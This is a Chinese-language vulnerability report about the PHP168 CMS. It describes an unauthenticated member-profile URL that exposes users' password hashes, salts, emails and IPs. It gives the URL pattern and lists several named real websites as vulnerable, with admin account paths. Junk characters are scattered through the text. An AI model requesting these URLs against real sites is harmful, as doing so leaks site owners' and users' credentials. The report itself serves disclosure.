|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
0 D5 o$ }9 O* v( [" Y, y D1 }1 l5 g% B% Y+ a
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:) y' i, K" M7 C8 V
# ~" K- {! I: b" C
http://php168.cn/com/homepage.php/admin/member-profile. T$ a! A9 c1 }1 u5 _, b1 v" k' x
$ K% [* }) Q3 |7 L9 Y由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。+ c7 W, N. c8 w$ F1 P9 j$ G" W
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
. d9 V! I) a5 {
0 Q: @( b8 q3 a# W% n4 }6 c 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:8 i5 ~0 s3 T; @$ o2 w
5 n$ x- c/ S: L: Bhttp://www.zjfzol.com.cn/homepage.php/admin/member-profile
! c( R a" j" Y m5 ^6 `0 _3 ]1 W# J7 Z" ~$ {
http://www.scswl.cn/homepage.php/admin/member-profile" t& ]- L! H: O
, \0 \" a8 _: z2 ^) e9 ^http://www.tunet.edu.cn/homepage.php/admin/member-profile3 ]7 I7 l+ p$ W. R7 t, k6 |' h* Z4 ]$ y* D
. s7 `1 G$ |( \7 r9 Y' q0 ~4 h* ~) |http://www.itlead.com.cn/homepage.php/admin/member-profile
6 U3 V3 A2 o8 P8 \; x" M" _" M6 C# L$ h, a. ?) w- U4 W
http://www.aedp.cn/homepage.php/admin/member-profile$ J" z, ]1 M: |& i u9 M
7 k# {, K3 a6 n, l4 \/ n ?http://www.qianlongnews.com/homepage.php/test/member-profile
6 g( H3 ^; F5 ?9 p% |5 a& x' U( m3 s2 J2 w
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
: z2 g% D4 ]4 @0 S1 x8 z& }[/table] |